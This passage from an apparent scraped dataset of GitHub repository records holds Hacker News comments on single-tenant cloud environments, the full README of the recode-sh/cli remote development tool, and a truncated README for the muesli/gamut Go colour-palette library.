platformcodename-$customerid-stage0\n - platformcodename-$customerid-prodand so on. At one of these places we were doing multi-cloud so each of these environments were a GCP Project and AWS subaccount. At another where we were on bare-metal put single-tenant customers in their own Kubernetes namespace (we were strong on genuine multi-tenancy), then we had a very special customer that we put on a dedicated Kubernetes cluster accompanied by a dedicated storage cluster.If you have robust DevOps this should be an easy problem to solve. I have to admit upfront I am probably biased to what \"robust DevOps\" means because of how many people I have recently encountered with \"DevOps\" in their title who shy away from stuff DevOps has been traditionally expected to do. Maybe I should think up a different role description for myself.This is a scary slope. 
A single client having their own environment 10 years ago was worth about 9% of sales so they need to be paying 10* what your next highest customer pays.Now if you are in AWS you can just invoice them the cost of their own subscription + 100% which makes it easier and they may pay.This is an interesting problem. I think a massive part of this is how much customers are paying. If it's enough, certain parts that may be hard to automate can be done manually.IaaC and good software packaging will help take care of your infra, but working with 3rd party managed services that may live outside of your cloud provider will vary. If the customers are paying a lot, it becomes worth the time to manually do those steps (after verifying that they can't be automated).Let's pretend you can automate with IaaC and docker images (although any deployment style works). You can wrap that entire process into a script that will initialize and all perform tests against the infra/service.I'm not too familiar with it outside of exam prep, but AWS (and probably the other big guys) offer the idea of an organization, which consists of multiple accounts. Makes for easier tracking, with strong isolation. Could be a route to go.There's a lot of variables here, and as others have said, it's a tricky path. I also think it's an interesting problem and I hope you have fun solving it.This would have to be a potential new line of business to be worth it unless the customer is willing to pay the cost to build and maintain plus a significant markup.We did something similar for a major healthcare client but our pricing scaled with volume and they paid for all our development costs + markup.Luckily we already had said no to a few smaller clients so when the solution was built we sold it to them as well.May I ask what backend platform / language are you using? I ask this because I've been developing something which is due to be released within Q1 of this year, and would like to understand my target market.Currently my solution works for Elixir / Phoenix and static pages. But I'm working on expanding to ruby / rails and nodeJS based frameworks.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "recode-sh/cli", "link": "https://github.com/recode-sh/cli", "tags": ["recode", "aws", "cli", "golang"], "stars": 506, "description": "A CLI to create remote development environments in your cloud provider account in seconds", "lang": "Go", "repo_lang": "", "readme": "

# Recode

Remote development environments defined as code. Running in your cloud provider account.
Currently available on Amazon Web Services and Visual Studio Code.

... you can think of it as a desktop version of Gitpod / Coder / GitHub Codespaces: less polished and with fewer features, but 100% free, 100% open-source and 100% community-driven
\n\n```bash\nrecode aws start recode-sh/workspace --instance-type t2.medium\n```\n\nhttps://user-images.githubusercontent.com/1233275/172346442-d6fef09c-2ef0-4633-8d72-e20bef8fc1a9.mp4\n\n\"vscode\"\n\n
... see the recode-sh/workspace repository for an example of development environment configuration
\n\n## Table of contents\n- [Requirements](#requirements)\n- [Installation](#installation)\n- [Usage](#usage)\n - [Login](#login)\n - [Start](#start)\n - [Stop](#stop)\n - [Remove](#remove)\n - [Uninstall](#uninstall)\n- [Development environments configuration](#development-environments-configuration)\n - [Tip: the --rebuild flag](#-tip-the---rebuild-flag)\n - [Tip: Docker & Docker compose](#-tip-docker--docker-compose)\n - [User configuration](#user-configuration)\n - [Project configuration](#project-configuration)\n - [What if I don't have an user configuration?](#-what-if-i-dont-have-an-user-configuration)\n - [Recode configuration](#recode-configuration)\n - [Base image (recode-sh/base-dev-env)](#base-image-recode-shbase-dev-env)\n - [Visual Studio Code extensions](#visual-studio-code-extensions)\n - [Multiple repositories](#multiple-repositories)\n - [Build arguments (RECODE_INSTANCE_OS and RECODE_INSTANCE_ARCH)](#build-arguments-recode_instance_os-and-recode_instance_arch)\n - [Hooks](#hooks)\n- [Frequently asked questions](#frequently-asked-questions)\n - [How does it compare with GitPod / Coder / Codespaces / X?](#-how-does-it-compare-with-gitpod--coder--codespaces--x)\n - [How does it compare with Vagrant / VSCode remote SSH / Container extensions?](#-how-does-it-compare-with-vagrant--vscode-remote-ssh--container-extensions)\n - [Why using Docker as a VM and not something like NixOS, for example?](#-why-using-docker-as-a-vm-and-not-something-like-nixos-for-example)\n - [Given that my dev env will run in a container does it mean that it will be limited?](#-given-that-my-dev-env-will-run-in-a-container-does-it-mean-that-it-will-be-limited)\n- [The future](#the-future)\n- [License](#license)\n\n## Requirements\n\nThe Recode binary has been tested on Linux and Mac. 
Support for Windows is theoretical ([testers needed](https://github.com/recode-sh/cli/issues/4) \ud83d\udc99).\n\nBefore using Recode, the following dependencies need to be installed:\n\n- [Visual Studio Code](https://code.visualstudio.com/) (currently the sole editor supported).\n\n- [OpenSSH Client](https://www.openssh.com/) (used to access your development environments).\n\n## Installation\n\nThe easiest way to install Recode is by running the following command in your terminal:\n\n```bash\ncurl -sf https://raw.githubusercontent.com/recode-sh/cli/main/install.sh | sh -s -- -b /usr/local/bin latest\n```\n\nThis command could be run as-is or by changing:\n\n - The installation directory by replacing `/usr/local/bin` with your **preferred path**.\n \n - The version installed by replacing `latest` with a **[specific version](https://github.com/recode-sh/cli/releases)**.\n\nOnce done, you could confirm that Recode is installed by running the `recode` command:\n\n```bash\nrecode --help\n```\n\n## Usage\n\n```console\nTo begin, run the command \"recode login\" to connect your GitHub account.\t\n\nFrom there, the most common workflow is:\n\n - recode start : to start a development environment for a specific GitHub repository\n - recode stop : to stop a development environment (without removing your data)\n - recode remove : to remove a development environment AND your data\n \n may be relative to your personal GitHub account (eg: cli) or fully qualified (eg: my-organization/api).\n\nUsage:\n recode [command]\n\nAvailable Commands:\n aws Use Recode on Amazon Web Services\n completion Generate the autocompletion script for the specified shell\n help Help about any command\n login Connect a GitHub account to use with Recode\n\nFlags:\n -h, --help help for recode\n -v, --version version for recode\n\nUse \"recode [command] --help\" for more information about a command.\n```\n\n### Login\n\n```bash\nrecode login\n```\nTo begin, you need to run the `login` command to connect your GitHub account.\n\nRecode requires the following permissions:\n\n - \"*Public SSH keys*\" and \"*Repositories*\" to let you access your repositories from your development environments.\n\t\n - \"*GPG Keys*\" and \"*Personal user data*\" to configure Git and sign your commits (verified badge).\n\n**All your data (including the OAuth access token) are only stored locally in `~/.config/recode/recode.yml` (or in `XDG_CONFIG_HOME` if set).**\n\nThe source code that implements the GitHub OAuth flow is located in the [recode-sh/api](https://github.com/recode-sh/api) repository.\n\n### Start\n\n```bash\nrecode start \n```\nThe `start` command creates and starts a development environment for a specific GitHub repository.\n\nIf a development environment is stopped, it will only be started. If a development environment is already started, only your code editor will be opened.\n\nAn `--instance-type` flag could be passed to specify the instance type that will power your development environment. (*See the corresponding cloud provider repository for default / valid values*).\n\n#### Examples\n\n```bash\nrecode aws start recode-sh/workspace\n```\n\n```bash\nrecode aws start recode-sh/workspace --instance-type t2.medium\n```\n\n### Stop\n\n```bash\nrecode stop \n```\nThe `stop` command stops a started development environment.\n\nStopping means that the underlying instance will be stopped but **your data will be conserved**. 
You may want to use this command to save costs when the development environment is not used.\n\n#### Example\n\n```bash\nrecode aws stop recode-sh/workspace\n```\n\n### Remove\n\n```bash\nrecode remove \n```\n\nThe `remove` command removes an existing development environment.\n\nRemoving means that the underlying instance **and all your data** will be **permanently removed**.\n\n#### Example\n\n```bash\nrecode aws remove recode-sh/workspace\n```\n\n### Uninstall\n\n```bash\nrecode uninstall\n```\n\nThe `uninstall` command removes all the infrastructure components used by Recode from your cloud provider account. (*See the corresponding cloud provider repository for details*).\n\n**Before running this command, all development environments need to be removed.**\n\n#### Example\n\n```bash\nrecode aws uninstall\n```\n\n## Development environments configuration\n\nIf you think about all the projects you've worked on, you may notice that you've:\n\n - a set of configuration / tools used for all your projects (eg: a preferred timezone / locale, a specific shell...);\n \n - a set of configuration / tools specific for each project (eg: docker compose, go >= 1.18 or node.js >= 14).\n\nThis is what Recode has tried to mimic with *user* and *project* configuration.\n\n#### \ud83d\udca1 Tip: the `--rebuild` flag\n\n```bash\nrecode aws start recode-sh/workspace --rebuild\n```\n\nIf you update the configuration of an existing development environment, you could use the `--rebuild` flag of the `start` command to rebuild it without having to delete it first.\n\n#### \ud83d\udca1 Tip: Docker & Docker compose\n\nDocker and Docker compose are already preinstalled in all development environments so you don't have to install them.\n\n### User configuration\n\nUser configuration corresponds to the set of configuration / tools used for all your projects. To create an user configuration, all you need to do is to:\n\n 1. Create a **repository** named `.recode` in your personal GitHub account.\n \n 2. Add a file named `dev_env.Dockerfile` in it.\n\nThe file `dev_env.Dockerfile` is a regular Dockerfile except that: \n\n - it must derive from `recode-sh/base-dev-env` (more below);\n \n - the user configuration needs to be applied to the user `recode`.\n\nOtherwise, you are free to do what you want with this file and this repository. 
You could see an example with dotfiles in [recode-sh/.recode](https://github.com/recode-sh/.recode) and use it as a GitHub repository template: \n\n```Dockerfile\n# User's dev env image must derive from recodesh/base-dev-env.\n# See https://github.com/recode-sh/base-dev-env/blob/main/Dockerfile for source.\nFROM recodesh/base-dev-env:latest\n\n# Set timezone\nENV TZ=America/Los_Angeles\n\n# Set locale\nRUN sudo locale-gen en_US.UTF-8\nENV LANG=en_US.UTF-8\nENV LANGUAGE=en_US:en \nENV LC_ALL=en_US.UTF-8\n\n# Install Zsh\nRUN set -euo pipefail \\\n && sudo apt-get --assume-yes --quiet --quiet update \\\n && sudo apt-get --assume-yes --quiet --quiet install zsh \\\n && sudo rm --recursive --force /var/lib/apt/lists/*\n\n# Install OhMyZSH and some plugins\nRUN set -euo pipefail \\\n && sh -c \"$(curl --fail --silent --show-error --location https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\" \\\n && git clone --quiet https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions \\\n && git clone --quiet https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting\n\n# Change default shell for user \"recode\"\nRUN set -euo pipefail \\\n && sudo usermod --shell $(which zsh) recode\n\n# Add all dotfiles to home folder\nCOPY --chown=recode:recode ./dotfiles/.* $HOME/\n```\n\n### Project configuration\n\nProject configuration corresponds to the set of configuration / tools specific for each project. As you may have guessed, to create a project configuration, all you need to do is to:\n\n 1. Create a **directory** named `.recode` in your project's repository.\n \n 2. Add a file named `dev_env.Dockerfile` in it.\n\nThe file `dev_env.Dockerfile` is a regular Dockerfile except that: \n\n - it must derive from `user_dev_env` (your user configuration);\n \n - the user configuration needs to be applied to the user `recode`.\n\nOtherwise, you are free to do what you want with this file and this directory. You could see an example in [recode-sh/workspace](https://github.com/recode-sh/workspace):\n\n```Dockerfile\n# Project's dev env image must derive from \"user_dev_env\"\n# (ie: github_user_name/.recode/dev_env.Dockerfile)\nFROM user_dev_env\n\n# VSCode extensions that need to be installed (optional)\nLABEL sh.recode.vscode.extensions=\"golang.go, zxh404.vscode-proto3, ms-azuretools.vscode-docker\"\n\n# GitHub repositories that need to be cloned (optional) (default to the current one)\nLABEL sh.recode.repositories=\"cli, agent, recode, aws-cloud-provider, base-dev-env, api, .recode, workspace\"\n\n# Reserved args (RECODE_*). 
Provided by Recode.\n# eg: linux\nARG RECODE_INSTANCE_OS\n# eg: amd64 or arm64\nARG RECODE_INSTANCE_ARCH\n\nARG GO_VERSION=1.18.2\n\n# Install Go and dev dependencies\nRUN set -euo pipefail \\\n && cd /tmp \\\n && LATEST_GO_VERSION=$(curl --fail --silent --show-error --location \"https://golang.org/VERSION?m=text\") \\\n && if [[ \"${GO_VERSION}\" = \"latest\" ]] ; then \\\n GO_VERSION_TO_USE=\"${LATEST_GO_VERSION}\" ; \\\n else \\\n GO_VERSION_TO_USE=\"go${GO_VERSION}\" ; \\\n fi \\\n && curl --fail --silent --show-error --location \"https://go.dev/dl/${GO_VERSION_TO_USE}.${RECODE_INSTANCE_OS}-${RECODE_INSTANCE_ARCH}.tar.gz\" --output go.tar.gz \\\n && sudo tar --directory /usr/local --extract --file go.tar.gz \\\n && rm go.tar.gz \\\n && /usr/local/go/bin/go install golang.org/x/tools/cmd/goimports@latest \\\n && /usr/local/go/bin/go install github.com/google/wire/cmd/wire@latest \\\n && /usr/local/go/bin/go install github.com/golang/mock/mockgen@latest\n\n# Add Go to path\nENV PATH=$PATH:/usr/local/go/bin:$HOME/go/bin\n\n...\n```\n#### \ud83d\udca1 What if I don't have an user configuration?\n\nIf you don't have an user configuration, **the [recode-sh/.recode](https://github.com/recode-sh/.recode) repository will be used as a default one**.\n\nThat's why you will have `zsh` configured as default shell in your project.\n\n### Recode configuration\n\nAs you may have noticed from previous sections, some commands in the `dev_env.Dockerfile` files (like the `LABEL` ones) are specific to Recode. This section will try to explain them.\n\n#### Base image ([recode-sh/base-dev-env](http://github.com/recode-sh/base-dev-env))\n\nAs you may have understood, all the development environments derive directly or indirectly from `recode-sh/base-dev-env`. You could see the source of this Docker image in the [recode-sh/base-dev-env](https://github.com/recode-sh/base-dev-env) repository:\n\n```Dockerfile\n# All development environments will be Ubuntu-based\nFROM ubuntu:22.04\n\nARG DEBIAN_FRONTEND=noninteractive\n\n# RUN will use bash\nSHELL [\"/bin/bash\", \"-c\"]\n\n# We want a \"standard Ubuntu\"\n# (ie: not one that has been minimized\n# by removing packages and content\n# not required in a production system)\nRUN yes | unminimize\n\n# Install system dependencies\nRUN set -euo pipefail \\\n && apt-get --assume-yes --quiet --quiet update \\\n && apt-get --assume-yes --quiet --quiet install \\\n apt-transport-https \\\n build-essential \\\n ca-certificates \\\n curl \\\n git \\\n gnupg \\\n locales \\\n lsb-release \\\n man-db \\\n manpages-posix \\\n nano \\\n sudo \\\n tzdata \\\n unzip \\\n vim \\\n wget \\\n && rm --recursive --force /var/lib/apt/lists/*\n\n# Install the Docker CLI. 
\n# The Docker daemon socket will be mounted from instance.\nRUN set -euo pipefail \\\n && curl --fail --silent --show-error --location https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor --output /usr/share/keyrings/docker-archive-keyring.gpg \\\n && echo \"deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release --codename --short) stable\" | tee /etc/apt/sources.list.d/docker.list > /dev/null \\\n && apt-get --assume-yes --quiet --quiet update \\\n && apt-get --assume-yes --quiet --quiet install docker-ce-cli \\\n && rm --recursive --force /var/lib/apt/lists/*\n\n# Install Docker compose\nRUN set -euo pipefail \\\n && LATEST_COMPOSE_VERSION=$(curl --fail --silent --show-error --location \"https://api.github.com/repos/docker/compose/releases/latest\" | grep --only-matching --perl-regexp '(?<=\"tag_name\": \").+(?=\")') \\\n && curl --fail --silent --show-error --location \"https://github.com/docker/compose/releases/download/${LATEST_COMPOSE_VERSION}/docker-compose-$(uname --kernel-name)-$(uname --machine)\" --output /usr/libexec/docker/cli-plugins/docker-compose \\\n && chmod +x /usr/libexec/docker/cli-plugins/docker-compose\n\n# Install entrypoint script\nCOPY ./recode_entrypoint.sh /\nRUN chmod +x /recode_entrypoint.sh\n\n# Configure the user \"recode\" in container.\n# Triggered during build on instance.\n# \n# We want the user \"recode\" inside the container to get \n# the same permissions than the user \"recode\" in the instance \n# (to access the Docker daemon, SSH keys and so on).\n# \n# To do this, the two users need to share the same UID/GID.\nONBUILD ARG RECODE_USER_ID\nONBUILD ARG RECODE_USER_GROUP_ID\nONBUILD ARG RECODE_DOCKER_GROUP_ID\n\nONBUILD RUN set -euo pipefail \\\n && RECODE_USER_HOME_DIR=\"/home/recode\" \\\n && RECODE_USER_WORKSPACE_DIR=\"${RECODE_USER_HOME_DIR}/workspace\" \\\n && RECODE_USER_WORKSPACE_CONFIG_DIR=\"${RECODE_USER_HOME_DIR}/.workspace-config\" \\\n && groupadd --gid \"${RECODE_USER_GROUP_ID}\" --non-unique recode \\\n && useradd --gid \"${RECODE_USER_GROUP_ID}\" --uid \"${RECODE_USER_ID}\" --non-unique --home \"${RECODE_USER_HOME_DIR}\" --create-home --shell /bin/bash recode \\\n && cp /etc/sudoers /etc/sudoers.orig \\\n && echo \"recode ALL=(ALL) NOPASSWD:ALL\" | tee /etc/sudoers.d/recode > /dev/null \\\n && groupadd --gid \"${RECODE_DOCKER_GROUP_ID}\" --non-unique docker \\\n && usermod --append --groups docker recode \\\n && mkdir --parents \"${RECODE_USER_WORKSPACE_CONFIG_DIR}\" \\\n && mkdir --parents \"${RECODE_USER_WORKSPACE_DIR}\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.ssh\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.gnupg\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.vscode-server\" \\\n && chown --recursive recode:recode \"${RECODE_USER_HOME_DIR}\" \\\n && chmod 700 \"${RECODE_USER_HOME_DIR}/.gnupg\"\n\nONBUILD WORKDIR /home/recode/workspace\nONBUILD USER recode\n\nONBUILD ENV USER=recode\nONBUILD ENV HOME=/home/recode\nONBUILD ENV EDITOR=/usr/bin/nano\n\nONBUILD ENV RECODE_WORKSPACE=/home/recode/workspace\nONBUILD ENV RECODE_WORKSPACE_CONFIG=/home/recode/.workspace-config\n\n# Only for documentation purpose.\n# Entrypoint and CMD are always set by the \n# Recode agent when running the dev env container.\nONBUILD ENTRYPOINT [\"/recode_entrypoint.sh\"]\nONBUILD CMD [\"sleep\", \"infinity\"]\n\n# Set default timezone\nENV TZ=America/Los_Angeles\n\n# Set default locale\n# /!\\ locale-gen must be run as root\nRUN 
locale-gen en_US.UTF-8\nENV LANG=en_US.UTF-8\nENV LANGUAGE=en_US:en\nENV LC_ALL=en_US.UTF-8\n```\n\nAs you can see, nothing fancy here. \n\nRecode is built on `ubuntu` with `docker` and `docker compose` pre-installed. An user `recode` is created and configured to be used as the default user. Root privileges are managed via `sudo`.\n\nYour repositories will be cloned in `/home/recode/workspace`. A default timezone and locale are set.\n\n*(To learn more, see the [recode-sh/base-dev-env](https://github.com/recode-sh/base-dev-env) repository)*.\n\n#### Visual Studio Code extensions\n\nIn order to require Visual Studio Code extensions to be installed in your development environment, you need to add a `LABEL` named `sh.recode.vscode.extensions` in your *user's* or *project's* `dev_env.Dockerfile`.\n\n*(As you may have guessed, if this label is added to your user configuration, all your projects will have the listed extensions installed).*\n\nAn extension is identified using its publisher name and extension identifier (`publisher.extension`). You can see the name on the extension's detail page.\n\n##### Example\n\n```Dockerfile\nLABEL sh.recode.vscode.extensions=\"golang.go, zxh404.vscode-proto3, ms-azuretools.vscode-docker\"\n```\n\n#### Multiple repositories\n\nIf you want to use multiple repositories in your development environment, you need to add a `LABEL` named `sh.recode.repositories` in your *project's* `dev_env.Dockerfile`.\n\n**In this case, we recommend you to create an empty repository that will only contain the `.recode` directory (as an example, see the [recode-sh/workspace](https://github.com/recode-sh/workspace) repository).**\n\n*(As you may have guessed, if this label is added to your user configuration it will be ignored).*\n\nRepositories may be set as relative to the current one (eg: `cli`) or fully qualified (eg: `recode-sh/cli`).\n\n##### Example\n\n```Dockerfile\nLABEL sh.recode.repositories=\"cli, agent, recode, aws-cloud-provider, base-dev-env, api, .recode, workspace\"\n```\n\n#### Build arguments (`RECODE_INSTANCE_OS` and `RECODE_INSTANCE_ARCH`)\n\nGiven the nature of this project, you need to take into account the fact that the characteristics of the instance used to run your development environment may vary depending on the one chosen by the final user.\n\nAs an example, an user may want to use an AWS graviton powered instance to run your project and, as a result, your *project's* `dev_env.Dockerfile` must be ready to be built for `ARM`.\n\nTo ease this process, Recode will pass to your `dev_env.Dockerfile` files two build arguments `RECODE_INSTANCE_OS` and `RECODE_INSTANCE_ARCH` that will contain both the current operating system (`linux`) and architecture (eg: `amd64`) respectively.\n\n##### Example\n\n```Dockerfile\n# Reserved args (RECODE_*). Provided by Recode.\n\n# eg: linux\nARG RECODE_INSTANCE_OS\n\n# eg: amd64 or arm64\nARG RECODE_INSTANCE_ARCH\n```\n\n#### Hooks\n\nHooks are shell scripts that will be run during the lifetime of your development environment. 
To be able to add a hook in a project, all you have to do is to add a directory named `hooks` in your `.recode` **directory**.\n\n##### First Hook\n\nBefore adding your first hook, the following things must be taken into account:\n\n - In the case of development environments **with only one repository**, hooks will only be run if a `dev_env.Dockerfile` file is set.\n \n - In the case of development environments **with multiple repositories**, all the hooks will be run, one after the other.\n \n - **The working directory of your scripts will be set to the root folder of their respective repository before running**.\n\n##### Init\n\nThe `init` hook is run once, **during the first start of your development environment**. You could use it to download your project dependencies, for example.\n\nCurrently, it's the sole hook available. To activate it, you need to add an `init.sh` file in your project's `hooks` directory.\n\n##### Example (taken from the [recode-sh/cli](https://github.com/recode-sh/cli/tree/main/.recode) repository)\n\n```bash\n#!/bin/bash\nset -euo pipefail\n\nlog () {\n echo -e \"${1}\" >&2\n}\n\nlog \"Downloading dependencies listed in go.mod\"\n\ngo mod download\n```\n\n## Frequently asked questions\n\n#### > How does it compare with GitPod / Coder / Codespaces / X?\n\n- 100% Free.\n- 100% Open-source.\n- 100% Private (run on your own cloud provider account).\n- 100% Cost-effective (run on simple VMs not on Kubernetes).\n- 100% Desktop.\n- 100% Multi regions.\n- 100% Customizable (from VM characteristics to installed runtimes).\n- 100% Community-driven (see below).\n\n... and 0% VC-backed. 0% Locked-in. 0% Proprietary config files.\n\n#### > How does it compare with Vagrant / VSCode remote SSH / Container extensions?\n\n- Remote development environments defined as code (with support for user and project configuration).\n- Automatic infrastructure / VM provisionning for multiple cloud providers.\n- Fully integrated with GitHub (private and multiple repositories, verified commits...).\n- Support the pre-installation of VSCode extensions.\n- Doesn't require a VM or Docker to be installed locally.\n- Doesn't tied to a specific code editor.\n\n#### > Why using Docker as a VM and not something like NixOS, for example?\n\nI'm aware that containers are not meant to be used as a VM like that (forgive me for that \ud83d\ude4f) but, at the time of writing, Docker is still the most widely used tool among developers to configure their environment (even if it may certainly change in the future).\n\n#### > Given that my dev env will run in a container does it mean that it will be limited?\n\nMostly not. \n\nGiven the scope of this project (a private instance running in your own cloud provider account), Docker is mostly used for configuration purpose and not to \"isolate\" the VM from your environment.\n\nAs a result, your development environment container will run in **[privileged mode](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities)** in the **[host network](https://docs.docker.com/network/host/)**.\n\n## The future\n\nThis project is **100% community-driven**, meaning that except for bug fixes **no more features will be added**. 
\n\nThe only features that will be added are the ones that will be [posted as an issue](https://github.com/recode-sh/cli/issues/new) and that will receive a significant amount of upvotes **(>= 10 currently)**.\n\n## License\n\nRecode is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).\n", "readme_type": "markdown", "hn_comments": "very similar, but seems a bit more polished is https://coder.com, you can write your own terraform modules and run it on whatever cloud you want.this is awesome. if you want to share some key insights, i imagine the team at coder would be excited to hear + exchange thoughts on the projectIs there a terminal within it?This is fun. I imagine that vendors these days set a stopwatch before an open source equivalent of their product appears, and that stopwatch time gets less every year (-:Nice one, does it handle port forwarding from inside the OpenVSCodeServer container?Recode is also the more than three decades old CLI utility that converts files between various character sets: https://github.com/rrthomas/recodeDoes it generate some config for AWS/ cloud providers or does it directly do deploy it? I would prefer if there is a easy to review text based config that can be deployed in another step.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "muesli/gamut", "link": "https://github.com/muesli/gamut", "tags": ["hue", "tints", "gamut", "color-palettes", "color-wheel", "themes", "color-schemes", "color-blending"], "stars": 506, "description": "Go package to generate and manage color palettes & schemes \ud83c\udfa8", "lang": "Go", "repo_lang": "", "readme": "# gamut\n\n[![Latest Release](https://img.shields.io/github/release/muesli/gamut.svg)](https://github.com/muesli/gamut/releases)\n[![Build Status](https://github.com/muesli/gamut/workflows/build/badge.svg)](https://github.com/muesli/gamut/actions)\n[![Coverage Status](https://coveralls.io/repos/github/muesli/gamut/badge.svg?branch=master)](https://coveralls.io/github/muesli/gamut?branch=master)\n[![Go ReportCard](https://goreportcard.com/badge/muesli/gamut)](https://goreportcard.com/report/muesli/gamut)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](https://pkg.go.dev/github.com/muesli/gamut)\n\nGo package to generate and manage color palettes & schemes\n\n```go\nimport \"github.com/muesli/gamut\"\nimport \"github.com/muesli/gamut/palette\"\nimport \"github.com/muesli/gamut/theme\"\n```\n\n## Colors\n\ngamut operates on various color spaces internally, but all color values you pass\nin as parameters and all return values will match Go\u2019s color.Color interface.\n\nLet\u2019s start with the basics. 
Just for convenience there\u2019s a hex-value parser:\n\n```go\ncolor = gamut.Hex(\"#333\")\ncolor = gamut.Hex(\"#ABCDEF\")\n```\n\nBoth the short and standard formats are supported.\n\nConversely you can retrieve the hex encoding of any `color.Color` value:\n\n```go\nhex = gamut.ToHex(color)\n```\n\n### Around the Color Wheel\n\nThe `Darker` and `Lighter` functions darken and lighten respectively a given\ncolor value by a specified percentage, without changing the color's hue:\n\n```go\n// returns a 10% darker version of color\ncolor = gamut.Darker(color, 0.1)\n// returns a 30% lighter version of color\ncolor = gamut.Lighter(color, 0.3)\n```\n\n`Complementary` returns the complementary color for a given color:\n\n```go\ncolor = gamut.Complementary(color)\n```\n\n`Contrast` returns the color with the highest contrast to a given color, either\nblack or white:\n\n```go\ncolor = gamut.Contrast(color)\n```\n\nTo retrieve a color with the same lightness and saturation, but a different\nangle on the color wheel, you can use the HueOffset function:\n\n```go\ncolor = gamut.HueOffset(color, 90)\n```\n\nYou can also go in the opposite direction by using negative values.\n\n### Schemes\n\nAll the following functions return colors of a different hue, but with the same\nlightness and saturation as the given colors:\n\nTriadic schemes are made up of three hues equally spaced around the color wheel:\n\n```go\ncolors = gamut.Triadic(color)\n```\n\nQuadratic schemes are made up of four hues equally spaced around the color wheel:\n\n```go\ncolors = gamut.Quadratic(color)\n```\n\nTetradic schemes are made up by two colors and their complementary values:\n\n```go\ncolors = gamut.Tetradic(color1, color2)\n```\n\nAnalogous schemes are created by using colors that are next to each other on the\ncolor wheel:\n\n```go\ncolors = gamut.Analogous(color)\n```\n\nSplitComplementary schemes are created by using colors next to the complementary\nvalue of a given color:\n\n```go\ncolors = gamut.SplitComplementary(color)\n```\n\n### Warm/Cool Colors\n\n```go\nok = gamut.Warm(color)\nok = gamut.Cool(color)\n```\n\n### Shades, Tints & Tones\n\n`Monochromatic` returns colors of the same hue, but with a different\nsaturation/lightness:\n\n```go\ncolors = gamut.Monochromatic(color, 8)\n```\n\n![Monochromatic Palette](https://github.com/muesli/gamut/blob/master/docs/palette_monochromatic.png)\n\n`Shades` returns colors blended from the given color to black:\n\n```go\ncolors = gamut.Shades(color, 8)\n```\n\n![Shades Palette](https://github.com/muesli/gamut/blob/master/docs/palette_shades.png)\n\n`Tints` returns colors blended from the given color to white:\n\n```go\ncolors = gamut.Tints(color, 8)\n```\n\n![Tints Palette](https://github.com/muesli/gamut/blob/master/docs/palette_tints.png)\n\n`Tones` returns colors blended from the given color to gray:\n\n```go\ncolors = gamut.Tones(color, 8)\n```\n\n![Tones Palette](https://github.com/muesli/gamut/blob/master/docs/palette_tones.png)\n\n### Blending Colors\n\n`Blends` returns interpolated colors by blending two colors:\n\n```go\ncolors = gamut.Blends(color1, color2, 8)\n```\n\n![Blends Palette](https://github.com/muesli/gamut/blob/master/docs/palette_blends.png)\n\n## Palettes\n\nGamut comes with six curated color palettes: Wikipedia, Crayola, CSS, RAL,\nResene, and Monokai. The Wikipedia palette is an import of common colors from\nWikipedia\u2019s List of Colors. New curated palettes and importers are welcome. 
Send me\na pull request!\n\n| Name | Colors | Source |\n| --------- | -----: | ------------------------------------------------------------ |\n| Wikipedia | 1609 | https://en.wikipedia.org/wiki/List_of_colors_(compact) |\n| Crayola | 180 | https://en.wikipedia.org/wiki/List_of_Crayola_crayon_colors |\n| CSS | 147 | https://developer.mozilla.org/en-US/docs/Web/CSS/color_value |\n| RAL | 213 | https://en.wikipedia.org/wiki/List_of_RAL_colors |\n| Resene | 759 | http://www.resene.co.nz |\n| Monokai | 17 | |\n\nThe function Colors lets you retrieve all colors in a palette:\n\n```go\nfor _, c := range palette.Wikipedia.Colors() {\n fmt.Println(c.Name, c.Color)\n}\n```\n\nThis will print out a list of 1609 color names, as defined by Wikipedia.\n\n### Creating Your Own Palettes\n\n```go\nvar p gamut.Palette\np.AddColors(\n gamut.Colors{\n {\"Name\", gamut.Hex(\"#123456\"), \"Reference\"},\n ...\n }\n)\n```\n\nName and Reference are optional when creating your own palettes.\n\n### Names\n\nEach color in the curated palettes comes with an \u201cofficial\u201d name. You can filter\npalettes by colors with specific names. This code snippet will return a list of\nall \u201cblue\u201d colors in the Wikipedia palette:\n\n```go\ncolors = palette.Wikipedia.Filter(\"blue\")\n```\n\nYou can access a color with a specific name using the `Color` function:\n\n```go\ncolor, ok = palette.Wikipedia.Color(\"Pastel blue\")\n```\n\nCalling a palette\u2019s `Name` function with a given color returns the name & distance\nof the closest (perceptually) matching color in it:\n\n```go\nname, distance = palette.Wikipedia.Name(color)\n// name = \"Baby blue\"\n// distance between 0.0 and 1.0\n```\n\n### Mixing Palettes\n\nYou can combine all colors of two palettes by mixing them:\n\n```go\np = palette.Crayola.MixedWith(palette.Monokai)\n```\n\n### Perception\n\nSometimes you got a slice of colors, but you have a limited color palette to\nwork with. The Clamped function returns a slice of the closest perceptually\nmatching colors in a palette, maintaining the same order as the original slice\nyou provided. 
